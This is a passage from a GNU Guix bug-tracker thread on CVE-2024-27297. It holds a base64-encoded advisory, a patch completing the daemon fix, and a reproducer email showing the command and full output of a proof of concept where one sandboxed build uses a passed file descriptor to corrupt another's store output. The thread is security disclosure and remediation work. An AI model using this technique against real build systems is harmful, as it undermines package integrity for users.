aGUgb3V0cHV0IHRvIHRoZQpzdG9yZSwgYXMgYSBwcml2aWxlZ2VkIHByb2Nlc3MuCgpJbiB0aGUg YnVpbGQgc2FuZGJveCBmb3IgYSBmaXhlZC1vdXRwdXQgZGVyaXZhdGlvbiwgYSBmaWxlIGRlc2Ny aXB0b3IKdG8gaXRzIGNvbnRlbnRzIGNvdWxkIGJlIHNoYXJlZCB3aXRoIGFub3RoZXIgcHJvY2Vz cyB2aWEgYSBVbml4CnNvY2tldC4gVGhpcyBvdGhlciBwcm9jZXNzLCBvdXRzaWRlIG9mIHRoZSBi dWlsZCBzYW5kYm94LCBjYW4gdGhlbgptb2RpZnkgdGhlIGNvbnRlbnRzIHdyaXR0ZW4gdG8gdGhl IHN0b3JlLCBjaGFuZ2luZyB0aGVtIHRvIHNvbWV0aGluZwptYWxpY2lvdXMgb3Igb3RoZXJ3aXNl IGNvcnJ1cHRpbmcgdGhlIG91dHB1dC4gV2hpbGUgdGhlIG91dHB1dCBoYXNoCmhhcyBhbHJlYWR5 IGJlZW4gZGV0ZXJtaW5lZCwgdGhlc2UgY2hhbmdlcyB3b3VsZCBtZWFuIGEgZml4ZWQtb3V0cHV0 CmRlcml2YXRpb24gY291bGQgaGF2ZSBjb250ZW50cyB3cml0dGVuIHRvIHRoZSBzdG9yZSB3aGlj aCBkbyBub3QgbWF0Y2gKdGhlIGV4cGVjdGVkIGhhc2guIFRoaXMgY291bGQgdGhlbiBiZSB1c2Vk IGJ5IHRoZSB1c2VyIG9yIG90aGVyCnBhY2thZ2VzIGFzIHdlbGwuCgojIE1pdGlnYXRpb24KClRo aXMgc2VjdXJpdHkgaXNzdWUgKHRyYWNrZWQgW2hlcmVdKGh0dHBzOi8vaXNzdWVzLmd1aXguZ251 Lm9yZy82OTcyOCkKZm9yIEdOVSBHdWl4KSBoYXMgYmVlbiBmaXhlZCBieSBhCltjb21taXRdKGh0 dHBzOi8vZ2l0LnNhdmFubmFoLmdudS5vcmcvY2dpdC9ndWl4LmdpdC9jb21taXQvP2lkPThmNGZm YjNmYWUxMzNiYjIxZDc5OTFlOTdjMmYxOWE3MTA4YjExNDMpCmJ5IEx1ZG92aWMgQ291cnTDqHMu IFVwZ3JhZGUgaW5zdHJ1Y3Rpb25zIGFyZSBpbiB0aGUgZm9sbG93aW5nIHNlY3Rpb24uCgpXaGls ZSBzZXZlcmFsIHBvc3NpYmxlIG1pdGlnYXRpb24gc3RyYXRlZ2llcyB3ZXJlIGRldGFpbGVkIGlu IHRoZQpvcmlnaW5hbCByZXBvcnQsIHRoZSBzaW1wbGVzdCBmaXggaXMganVzdCBjb3B5IHRoZSBk ZXJpdmF0aW9uIG91dHB1dApzb21ld2hlcmUgZWxzZSwgZGVsZXRpbmcgdGhlIG9yaWdpbmFsLCBi ZWZvcmUgd3JpdGluZyB0byB0aGUgc3RvcmUuCkFueSBmaWxlIGRlc2NyaXB0b3JzIHdpbGwgbm8g bG9uZ2VyIHBvaW50IHRvIHRoZSBjb250ZW50cyB3aGljaCBnZXQKd3JpdHRlbiB0byB0aGUgc3Rv cmUsIHNvIG9ubHkgdGhlIGBndWl4LWRhZW1vbmAgc2hvdWxkIGJlIGFibGUgdG8Kd3JpdGUgdG8g dGhlIHN0b3JlLCBhcyBkZXNpZ25lZC4gVGhpcyBpcyB3aGF0IHRoZSBOaXggcHJvamVjdCB1c2Vk IGluCnRoZWlyIFtvd24KZml4XShodHRwczovL2dpdGh1Yi5jb20vTml4T1Mvbml4L2NvbW1pdC8y NDRmM2VlZTBiYmM3ZjExZTliMzgzYTE1ZWQ3MzY4ZTJjNGJlY2M5KS4KVGhpcyBkb2VzIGFkZCBh biBhZGRpdGlvbmFsIGNvcHkvZGVsZXRlIGZvciBlYWNoIGZpbGUsIHdoaWNoIG1heSBhZGQgYQpw ZXJmb3JtYW5jZSBwZW5hbHR5IGZvciBkZXJpdmF0aW9ucyB3aXRoIG1hbnkgZmlsZXMuCgojIFVw Z3JhZGluZwoKRHVlIHRvIHRoZSBzZXZlcml0eSBvZiB0aGlzIHNlY3VyaXR5IGFkdmlzb3J5LCB3 ZSBzdHJvbmdseSByZWNvbW1lbmQKYWxsIHVzZXJzIHRvIHVwZ3JhZGUgdGhlaXIgYGd1aXgtZGFl bW9uYCBpbW1lZGlhdGVseS4KCkZvciBhIEd1aXggU3lzdGVtIHRoZSBwcm9jZWR1cmUgaXMganVz dCByZWNvbmZpZ3VyaW5nIHRoZSBzeXN0ZW0gYWZ0ZXIKYSBgZ3VpeCBwdWxsYCwgZWl0aGVyIHJl c3RhcnRpbmcgYGd1aXgtZGFlbW9uYCBvciByZWJvb3RpbmcuIEZvcgpleGFtcGxlLAoKYGBgc2gK Z3VpeCBwdWxsCnN1ZG8gZ3VpeCBzeXN0ZW0gcmVjb25maWd1cmUgL3J1bi9jdXJyZW50LXN5c3Rl bS9jb25maWd1cmF0aW9uLnNjbQpzdWRvIGhlcmQgcmVzdGFydCBndWl4LWRhZW1vbgpgYGAKCndo ZXJlIGAvcnVuL2N1cnJlbnQtc3lzdGVtL2NvbmZpZ3VyYXRpb24uc2NtYCBpcyB0aGUgY3VycmVu dCBzeXN0ZW0KY29uZmlndXJhdGlvbiBidXQgY291bGQsIG9mIGNvdXJzZSwgYmUgcmVwbGFjZWQg YnkgYSBzeXN0ZW0KY29uZmlndXJhdGlvbiBmaWxlIG9mIGEgdXNlcidzIGNob2ljZS4KCkZvciBH dWl4IHJ1bm5pbmcgYXMgYSBwYWNrYWdlIG1hbmFnZXIgb24gb3RoZXIgZGlzdHJpYnV0aW9ucywg b25lCm5lZWRzIHRvIGBndWl4IHB1bGxgIHdpdGggYHN1ZG9gLCBhcyB0aGUgYGd1aXgtZGFlbW9u YCBydW5zIGFzIHJvb3QsCmFuZCByZXN0YXJ0IHRoZSBgZ3VpeC1kYWVtb25gIHNlcnZpY2UuIEZv ciBleGFtcGxlLCBvbiBhIHN5c3RlbSB1c2luZwpzeXN0ZW1kIHRvIG1hbmFnZSBzZXJ2aWNlcywK CmBgYHNoCnN1ZG8gLS1sb2dpbiBndWl4IHB1bGwKc3VkbyBzeXN0ZW1jdGwgcmVzdGFydCBndWl4 LWRhZW1vbi5zZXJ2aWNlCmBgYAoKTm90ZSB0aGF0IGZvciB1c2VycyB3aXRoIHRoZWlyIGRpc3Ry bydzIHBhY2thZ2Ugb2YgR3VpeCAoYXMgb3Bwb3NlZCB0bwpoYXZpbmcgdXNlZCB0aGUgW2luc3Rh bGwKc2NyaXB0XShodHRwczovL2d1aXguZ251Lm9yZy9lbi9tYW51YWwvZGV2ZWwvZW4vaHRtbF9u b2RlL0JpbmFyeS1JbnN0YWxsYXRpb24uaHRtbCkpCnlvdSBtYXkgbmVlZCB0byB0YWtlIG90aGVy IHN0ZXBzIG9yIHVwZ3JhZGUgdGhlIEd1aXggcGFja2FnZSBhcyBwZXIKb3RoZXIgcGFja2FnZXMg b24geW91ciBkaXN0cm8uIFBsZWFzZSBjb25zdWx0IHRoZSByZWxldmFudApkb2N1bWVudGF0aW9u IGZyb20geW91ciBkaXN0cm8gb3IgY29udGFjdCB0aGUgcGFja2FnZSBtYWludGFpbmVyIGZvcgph ZGRpdGlvbmFsIGluZm9ybWF0aW9uIG9yIHF1ZXN0aW9ucy4KCiMgQ29uY2x1c2lvbgoKT25lIG9m IHRoZSBrZXkgZmVhdHVyZXMgYW5kIGRlc2lnbiBwcmluY2lwbGVzIG9mIEdOVSBHdWl4IGlzIHRv IGFsbG93CnVucHJpdmlsZWdlZCBwYWNrYWdlIG1hbmFnZW1lbnQgdGhyb3VnaCBhIHNlY3VyZSBh bmQgcmVwcm9kdWNpYmxlCltidWlsZAplbnZpcm9ubWVudF0oaHR0cHM6Ly9ndWl4LmdudS5vcmcv ZW4vbWFudWFsL2RldmVsL2VuL2h0bWxfbm9kZS9CdWlsZC1FbnZpcm9ubWVudC1TZXR1cC5odG1s KS4KV2hpbGUgZXZlcnkgZWZmb3J0IGlzIG1hZGUgdG8gcHJvdGVjdCB0aGUgdXNlciBhbmQgc3lz dGVtIGZyb20gYW55Cm1hbGljaW91cyBhY3RvcnMsIGl0IGlzIGFsd2F5cyBwb3NzaWJsZSB0aGF0 IHRoZXJlIGFyZSBmbGF3cyB5ZXQgdG8gYmUKZGlzY292ZXJlZCwgYXMgaGFzIGhhcHBlbmVkIGhl cmUuIEluIHRoaXMgY2FzZSwgdXNpbmcgdGhlIGluZ3JlZGllbnRzCm9mIGhvdyBmaWxlIGRlc2Ny aXB0b3JzIGFuZCBVbml4IHNvY2tldHMgd29yayBldmVuIGluIHRoZSBpc29sYXRlZApidWlsZCBl bnZpcm9ubWVudCBhbGxvd2VkIGZvciBhIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdHkgd2l0aCBtb2Rl cmF0ZQppbXBhY3QuCgpPdXIgdGhhbmtzIHRvIGphZGUgYW5kIHB1Y2tpcGVkaWEgZm9yIHRoZSBv cmlnaW5hbCByZXBvcnQsIGFuZCBGw6lsaXgKQmF5bGFjIEphY3F1w6kgZm9yIGJyaW5naW5nIHRo aXMgdG8gdGhlIGF0dGVudGlvbiBvZiB0aGUgR05VIEd1aXgKW3NlY3VyaXR5IHRlYW1dKGh0dHBz Oi8vZ3VpeC5nbnUub3JnL2VuL3NlY3VyaXR5LykuIEFuZCBhIHNwZWNpYWwKdGhhbmtzIHRvIEx1 ZG92aWMgQ291cnTDqHMgZm9yIGEgcHJvbXB0IGZpeC4KCk5vdGUgdGhhdCB0aGVyZSBhcmUgY3Vy cmVudCBlZmZvcnRzIHRvIHJld3JpdGUgdGhlIGBndWl4LWRhZW1vbmAgaW4KR3VpbGUgYnkgQ2hy aXN0b3BoZXIgQmFpbmVzLiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBhbmQgdGhlIGxhdGVzdCBuZXdz Cm9uIHRoaXMgZnJvbnQsIHBsZWFzZSByZWZlciB0byB0aGUgW3JlY2VudCBibG9nCnBvc3RdKGh0 dHBzOi8vZ3VpeC5nbnUub3JnL2VuL2Jsb2cvMjAyMy9hLWJ1aWxkLWRhZW1vbi1pbi1ndWlsZS8p IGFuZApbdGhpcwptZXNzYWdlXShodHRwczovL2xpc3RzLmdudS5vcmcvYXJjaGl2ZS9odG1sL2d1 aXgtZGV2ZWwvMjAyNC0wMi9tc2cwMDI1My5odG1sKQpvbiB0aGUgW2d1aXgtZGV2ZWxdKGh0dHBz Oi8vbGlzdHMuZ251Lm9yZy9tYWlsbWFuL2xpc3RpbmZvL2d1aXgtZGV2ZWwpCm1haWxpbmcgbGlz dC4KCiMjIyBBYm91dCBHTlUgR3VpeAoKW0dOVSBHdWl4XShodHRwczovL2d1aXguZ251Lm9yZykg aXMgYSB0cmFuc2FjdGlvbmFsIHBhY2thZ2UgbWFuYWdlcgphbmQgYW4gYWR2YW5jZWQgZGlzdHJp YnV0aW9uIG9mIHRoZSBHTlUgc3lzdGVtIHRoYXQgW3Jlc3BlY3RzIHVzZXIKZnJlZWRvbV0oaHR0 cHM6Ly93d3cuZ251Lm9yZy9kaXN0cm9zL2ZyZWUtc3lzdGVtLWRpc3RyaWJ1dGlvbi1ndWlkZWxp bmVzLmh0bWwpLgpHdWl4IGNhbiBiZSB1c2VkIG9uIHRvcCBvZiBhbnkgc3lzdGVtIHJ1bm5pbmcg dGhlIEh1cmQgb3IgdGhlIExpbnV4Cmtlcm5lbCwgb3IgaXQgY2FuIGJlIHVzZWQgYXMgYSBzdGFu ZGFsb25lIG9wZXJhdGluZyBzeXN0ZW0KZGlzdHJpYnV0aW9uIGZvciBpNjg2LCB4ODZfNjQsIEFS TXY3LCBBQXJjaDY0LCBhbmQgUE9XRVI5IG1hY2hpbmVzLgoKSW4gYWRkaXRpb24gdG8gc3RhbmRh cmQgcGFja2FnZSBtYW5hZ2VtZW50IGZlYXR1cmVzLCBHdWl4IHN1cHBvcnRzCnRyYW5zYWN0aW9u YWwgdXBncmFkZXMgYW5kIHJvbGwtYmFja3MsIHVucHJpdmlsZWdlZCBwYWNrYWdlCm1hbmFnZW1l bnQsIHBlci11c2VyIHByb2ZpbGVzLCBhbmQgZ2FyYmFnZSBjb2xsZWN0aW9uLiBXaGVuIHVzZWQg YXMgYQpzdGFuZGFsb25lIEdOVS9MaW51eCBkaXN0cmlidXRpb24sIEd1aXggb2ZmZXJzIGEgZGVj bGFyYXRpdmUsCnN0YXRlbGVzcyBhcHByb2FjaCB0byBvcGVyYXRpbmcgc3lzdGVtIGNvbmZpZ3Vy YXRpb24gbWFuYWdlbWVudC4gR3VpeAppcyBoaWdobHkgY3VzdG9taXphYmxlIGFuZCBoYWNrYWJs ZSB0aHJvdWdoCltHdWlsZV0oaHR0cHM6Ly93d3cuZ251Lm9yZy9zb2Z0d2FyZS9ndWlsZSkgcHJv Z3JhbW1pbmcgaW50ZXJmYWNlcyBhbmQKZXh0ZW5zaW9ucyB0byB0aGUgW1NjaGVtZV0oaHR0cDov L3NjaGVtZXJzLm9yZykgbGFuZ3VhZ2UuCg== --b1_v9MImMNBpPThzWrxGvqTjxdi8tCRgZnkdE9D8lqlmSc-- From debbugs-submit-bounces@debbugs.gnu.org Tue Mar 12 09:31:51 2024 Received: (at 69728) by debbugs.gnu.org; 12 Mar 2024 13:31:51 +0000 Received: from localhost ([127.0.0.1]:42083 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk2ER-0005xH-0V for submit@debbugs.gnu.org; Tue, 12 Mar 2024 09:31:51 -0400 Received: from eggs.gnu.org ([209.51.188.92]:37266) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk2EO-0005x4-5l for 69728@debbugs.gnu.org; Tue, 12 Mar 2024 09:31:49 -0400 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rk2Di-0001n0-Bp; Tue, 12 Mar 2024 09:31:07 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=MIME-Version:Date:References:In-Reply-To:Subject:To: From; bh=ApG/gHDiTE1k3aAxBiJqo9n/srVBwLyCkr8lEWPgc+U=; b=JFZl/t5Vs1DXkerv0xqF KHOBGrygJPO1XFkcYKiLo52Pk7fFXB8szXqxdoNZfwWNTbW1rFKKGxb0LVlhakNZeVhvg4R8UsI9N X0QG0oWQZiPl8u5bq0xdyJGybOqSX4EUVnE0l2xH5NCNrO77leB6I/y/eNU9riOyStag+Q5VPTpgf mS6HSUsaNKKihcSluQN5TJ6Dt+dCYI4eWD+7tq/995f+rbKnqnhIEoU9TYMFMGUrucHG2h4FYqT+c vaR64BWbvo6VAXMsQ4uMhqBPyxF5j0AkxrGX/oqvEQKlodDxyzOhFxJHT7QpMzpyac7QZ+M7Tc1KZ R22Hb6onELQ1wg==; From: =?utf-8?Q?Ludovic_Court=C3=A8s?= To: 69728@debbugs.gnu.org Subject: Re: bug#69728: [PATCH security] daemon: Protect against FD escape when building fixed-output derivations (CVE-2024-27297). In-Reply-To: <87frwwo1mo.fsf@gnu.org> ("Ludovic =?utf-8?Q?Court=C3=A8s=22'?= =?utf-8?Q?s?= message of "Mon, 11 Mar 2024 23:16:31 +0100") References: <87frwwo1mo.fsf@gnu.org> Date: Tue, 12 Mar 2024 14:31:00 +0100 Message-ID: <87ttlblgq3.fsf_-_@gnu.org> User-Agent: Gnus/5.13 (Gnus v5.13) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="=-=-=" X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 69728 Cc: Picnoir , =?utf-8?Q?Th=C3=A9ophane?= Hufschmitt , guix-security@gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) --=-=-= Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Hello, Ludovic Court=C3=A8s skribis: > Pushed (with a slightly different commit message) as > 8f4ffb3fae133bb21d7991e97c2f19a7108b1143. > > Updated the =E2=80=98guix=E2=80=99 package in b8954a7faeccae11c32add7cd0f= 408d139af3a43: > Guix System users can now reconfigure! > > Added a news entry in 4003c60abf7a6e59e47cc2deb9eef2f104ebb994. It turns out that the previous fix was incomplete due to a mistake of mine. I pushed ff1251de0bc327ec478fc66a562430fbf35aef42 to address that (patch attached for clarity). Commit 30a8de0bcdadfb55cbcaa34760527c1b767808c7 updates the =E2=80=98guix= =E2=80=99 package again. Now is the time to reconfigure. I=E2=80=99ll send a reproducer in a separa= te message. Apologies for the mishap. Ludo=E2=80=99. --=-=-= Content-Type: text/x-patch; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable commit ff1251de0bc327ec478fc66a562430fbf35aef42 Author: Ludovic Court=C3=A8s Date: Tue Mar 12 11:53:35 2024 +0100 daemon: Address shortcoming in previous security fix for CVE-2024-27297. =20=20=20=20 This is a followup to 8f4ffb3fae133bb21d7991e97c2f19a7108b1143. =20=20=20=20 Commit 8f4ffb3fae133bb21d7991e97c2f19a7108b1143 fell short in two ways: (1) it didn=E2=80=99t have any effet for fixed-output derivations performed in a chroot, which is the case for all of them except those using =E2=80=9Cbuiltin:download=E2=80=9D and =E2=80=9Cbuiltin:git-downl= oad=E2=80=9D, and (2) it did not preserve ownership when copying, leading to =E2=80=9Csuspicious ownersh= ip or permission [=E2=80=A6] rejecting this build output=E2=80=9D errors. =20=20=20=20 * nix/libstore/build.cc (DerivationGoal::buildDone): Account for =E2=80=98chrootRootDir=E2=80=99 when copying =E2=80=98drv.outputs=E2=80= =99. * nix/libutil/util.cc (copyFileRecursively): Add =E2=80=98fchown=E2=80= =99 and =E2=80=98fchownat=E2=80=99 calls to preserve file ownership; this is necessary for chrooted fixed-output derivation builds. * nix/libutil/util.hh: Update comment. =20=20=20=20 Change-Id: Ib59f040e98fed59d1af81d724b874b592cbef156 diff --git a/nix/libstore/build.cc b/nix/libstore/build.cc index e2adee118b..d23c0944a4 100644 --- a/nix/libstore/build.cc +++ b/nix/libstore/build.cc @@ -1387,13 +1387,14 @@ void DerivationGoal::buildDone() make sure that there's no stale file descriptor pointing to= it (CVE-2024-27297). */ foreach (DerivationOutputs::iterator, i, drv.outputs) { - if (pathExists(i->second.path)) { - Path pivot =3D i->second.path + ".tmp"; - copyFileRecursively(i->second.path, pivot, true); - int err =3D rename(pivot.c_str(), i->second.path.c_str()); + Path output =3D chrootRootDir + i->second.path; + if (pathExists(output)) { + Path pivot =3D output + ".tmp"; + copyFileRecursively(output, pivot, true); + int err =3D rename(pivot.c_str(), output.c_str()); if (err !=3D 0) throw SysError(format("renaming `%1%' to `%2%'") - % pivot % i->second.path); + % pivot % output); } } } diff --git a/nix/libutil/util.cc b/nix/libutil/util.cc index 493f06f357..578d657293 100644 --- a/nix/libutil/util.cc +++ b/nix/libutil/util.cc @@ -422,6 +422,7 @@ static void copyFileRecursively(int sourceroot, const P= ath &source, if (destinationFd =3D=3D -1) throw SysError(format("opening `%1%'") % sou= rce); =20 copyFile(sourceFd, destinationFd); + fchown(destinationFd, st.st_uid, st.st_gid); } else if (S_ISLNK(st.st_mode)) { char target[st.st_size + 1]; ssize_t result =3D readlinkat(sourceroot, source.c_str(), target, st.st_s= ize); @@ -430,6 +431,8 @@ static void copyFileRecursively(int sourceroot, const P= ath &source, int err =3D symlinkat(target, destinationroot, destination.c_str()); if (err !=3D 0) throw SysError(format("creating symlink `%1%'") % destination); + fchownat(destinationroot, destination.c_str(), + st.st_uid, st.st_gid, AT_SYMLINK_NOFOLLOW); } else if (S_ISDIR(st.st_mode)) { int err =3D mkdirat(destinationroot, destination.c_str(), 0755); if (err !=3D 0) @@ -455,6 +458,7 @@ static void copyFileRecursively(int sourceroot, const P= ath &source, for (auto & i : readDirectory(sourceFd)) copyFileRecursively((int)sourceFd, i.name, (int)destinationFd, i.name, deleteSource); + fchown(destinationFd, st.st_uid, st.st_gid); } else throw Error(format("refusing to copy irregular file `%1%'") % s= ource); =20 if (deleteSource) diff --git a/nix/libutil/util.hh b/nix/libutil/util.hh index 058f5f8446..377aac0684 100644 --- a/nix/libutil/util.hh +++ b/nix/libutil/util.hh @@ -102,9 +102,10 @@ void deletePath(const Path & path); void deletePath(const Path & path, unsigned long long & bytesFreed, size_t linkThreshold =3D 1); =20 -/* Copy SOURCE to DESTINATION, recursively. Throw if SOURCE contains a fi= le - that is not a regular file, symlink, or directory. When DELETESOURCE is - true, delete source files once they have been copied. */ +/* Copy SOURCE to DESTINATION, recursively, preserving ownership. Throw if + SOURCE contains a file that is not a regular file, symlink, or director= y. + When DELETESOURCE is true, delete source files once they have been + copied. */ void copyFileRecursively(const Path &source, const Path &destination, bool deleteSource =3D false); =20 --=-=-=-- From debbugs-submit-bounces@debbugs.gnu.org Tue Mar 12 09:46:53 2024 Received: (at 69728) by debbugs.gnu.org; 12 Mar 2024 13:46:53 +0000 Received: from localhost ([127.0.0.1]:42098 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk2Sy-0006II-6s for submit@debbugs.gnu.org; Tue, 12 Mar 2024 09:46:53 -0400 Received: from eggs.gnu.org ([209.51.188.92]:48172) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1rk2St-0006I2-EG for 69728@debbugs.gnu.org; Tue, 12 Mar 2024 09:46:50 -0400 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1rk2SE-0004Th-Ei; Tue, 12 Mar 2024 09:46:06 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=MIME-Version:Date:References:In-Reply-To:Subject:To: From; bh=sGzF6ZJLbgNLRoUAmtQPv1QSXj66/vKFkkUU4pOA5Wk=; b=YJM0EJ0Zwgt32ChUqBJb ia/C0Kt1n+tRWeOluG4Cqq1YjKyL5D2oGBDmgEeGt3dS+uOqttZeZvfMbQu2Bhn5kXJxWRrQRZeak 7C1M20GfPuyrlvlTdQ6+kVcfP6TWUsa1/eVr8GMdRaPYPna6anplk2ajJrPq+A1i1hyHoHxYWfJef bJFFP0m6cBIrl2dnRsMSvmtI4LdxTgQwtK/xzifMN+02qs0lsTDsrtNkqdWbf6NhasAWig+nZnwp2 Q4PEYTViB/lL6XgoYazSZdDDhZFn79/hhP7GdK3Zwy9c5VBSzWhsP5X2siTGJNzUS6KRspvZBU2vi IoD8KmVsslPmCA==; From: =?utf-8?Q?Ludovic_Court=C3=A8s?= To: 69728@debbugs.gnu.org Subject: Reproducer for the daemon fixed-output derivation vulnerability In-Reply-To: <87frwwo1mo.fsf@gnu.org> ("Ludovic =?utf-8?Q?Court=C3=A8s=22'?= =?utf-8?Q?s?= message of "Mon, 11 Mar 2024 23:16:31 +0100") References: <87frwwo1mo.fsf@gnu.org> Date: Tue, 12 Mar 2024 14:45:56 +0100 Message-ID: <871q8flg17.fsf_-_@gnu.org> User-Agent: Gnus/5.13 (Gnus v5.13) MIME-Version: 1.0 Content-Type: multipart/signed; boundary="==-=-="; micalg=pgp-sha512; protocol="application/pgp-signature" X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 69728 Cc: Picnoir , =?utf-8?Q?Th=C3=A9ophane?= Hufschmitt , guix-security@gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) --==-=-= Content-Type: multipart/mixed; boundary="=-=-=" --=-=-= Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable As promised, attached is a reproducer that I adapted from the Nix one at , which I think was written by puck . The program demonstrates the vulnerability using two fixed-output derivations that must be built concurrently on the same machine. To do that, run: guix build -f fixed-output-derivation-corruption.scm -M4 Normally, you=E2=80=99ll find yourself building =E2=80=9Cderivation-that-exfiltrates-fd.drv=E2=80=9D and =E2=80=9Cderivatio= n-that-grabs-fd.drv=E2=80=9D in parallel; the former will send a file descriptor to the latter using a C program, and the latter will use that file descriptor to modify the contents of /gnu/store/=E2=80=A6-derivation-that-exfiltrates-fd after it has completed. On a safe system, the =E2=80=98guix build=E2=80=99 command succeeds like th= is: =2D-8<---------------cut here---------------start------------->8--- $ guix build -f fixed-output-derivation-corruption.scm -M4 /home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: = warning: importing module (guix config) from the host /home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: = warning: importing module (guix config) from the host substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0% substitute: updating substitutes from 'https://bordeaux.guix.gnu.org'... 10= 0.0% The following derivations will be built: /gnu/store/gwjb6hinjnnxlrrjxxvwa0n7gxyzlb5l-checking-for-vulnerability.drv /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-that-grabs-fd-65f0= 5a81-17185.drv /gnu/store/a4jabck4l27y4nfjd2agq4m9vp7whqrz-derivation-that-exfiltrates-f= d-65f05a81-17185.drv building /gnu/store/a4jabck4l27y4nfjd2agq4m9vp7whqrz-derivation-that-exfilt= rates-fd-65f05a81-17185.drv... building /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-that-grabs-= fd-65f05a81-17185.drv... accepting connections... attempting connection... preparing our hand... successfully built /gnu/store/a4jabck4l27y4nfjd2agq4m9vp7whqrz-derivation-t= hat-exfiltrates-fd-65f05a81-17185.drv The following build is still in progress: /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-that-grabs-fd-65f0= 5a81-17185.drv swaptrick finished, now to wait.. successfully built /gnu/store/8wf8mpn0syy5yay3nbrzr3w53jd925rc-derivation-t= hat-grabs-fd-65f05a81-17185.drv building /gnu/store/gwjb6hinjnnxlrrjxxvwa0n7gxyzlb5l-checking-for-vulnerabi= lity.drv... This depends on /gnu/store/b03pq9ns0y7l12c08wy9jc8lbmkmy33j-derivation-that= -grabs-fd-65f05a81-17185, which will grab the file descriptor and corrupt /gnu/store/i0qcxrhmckni6snn1angzi54pxx3fm1k-derivati= on-that-exfiltrates-fd-65f05a81-17185. Here is what we see in /gnu/store/i0qcxrhmckni6snn1angzi54pxx3fm1k-derivati= on-that-exfiltrates-fd-65f05a81-17185: "This is the original text, before c= orruption." Failed to corrupt /gnu/store/i0qcxrhmckni6snn1angzi54pxx3fm1k-derivation-th= at-exfiltrates-fd-65f05a81-17185, your system is safe. successfully built /gnu/store/gwjb6hinjnnxlrrjxxvwa0n7gxyzlb5l-checking-for= -vulnerability.drv /gnu/store/5xsvwbld5c5zxi075j45sfnvsx9f658v-checking-for-vulnerability =2D-8<---------------cut here---------------end--------------->8--- On a system that is still vulnerable, we get this instead: =2D-8<---------------cut here---------------start------------->8--- $ guix build -f fixed-output-derivation-corruption.scm -M4 /home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: = warning: importing module (guix config) from the host /home/ludo/src/guix-debugging/fixed-output-derivation-corruption.scm:20:7: = warning: importing module (guix config) from the host substitute: updating substitutes from 'https://ci.guix.gnu.org'... 100.0% substitute: updating substitutes from 'https://bordeaux.guix.gnu.org'... 10= 0.0% substitute: updating substitutes from 'https://guix.bordeaux.inria.fr'... 1= 00.0% The following derivations will be built: /gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerability.drv /gnu/store/a2xmgshnyqw7dafnmhdsjxr6f1qqa9da-derivation-that-exfiltrates-f= d-65f05aca-17261.drv /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-that-grabs-fd-65f0= 5aca-17261.drv building /gnu/store/a2xmgshnyqw7dafnmhdsjxr6f1qqa9da-derivation-that-exfilt= rates-fd-65f05aca-17261.drv... building /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-that-grabs-= fd-65f05aca-17261.drv... accepting connections... attempting connection... preparing our hand... successfully built /gnu/store/a2xmgshnyqw7dafnmhdsjxr6f1qqa9da-derivation-t= hat-exfiltrates-fd-65f05aca-17261.drv The following build is still in progress: /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-that-grabs-fd-65f0= 5aca-17261.drv swaptrick finished, now to wait.. successfully built /gnu/store/arw3as4x4i61xg3yvfk9lsa9jcrwlpqb-derivation-t= hat-grabs-fd-65f05aca-17261.drv building /gnu/store/gph10hc3b2ys49sx58l5wjj4ybf81a2l-checking-for-vulnerabi= lity.drv... This depends on /gnu/store/iqggpsrj9i0ydpqpb98iszx1vnbkgr19-derivation-that= -grabs-fd-65f05aca-17261, which will grab the file descriptor and corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivati= on-that-exfiltrates-fd-65f05aca-17261. Here is what we see in /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivati= on-that-exfiltrates-fd-65f05aca-17261: "This file has been corrupted!\n" We managed to corrupt /gnu/store/yls7xkg8k0i0qxab8sv960qsy6a0xcz7-derivatio= n-that-exfiltrates-fd-65f05aca-17261, meaning that YOUR SYSTEM IS 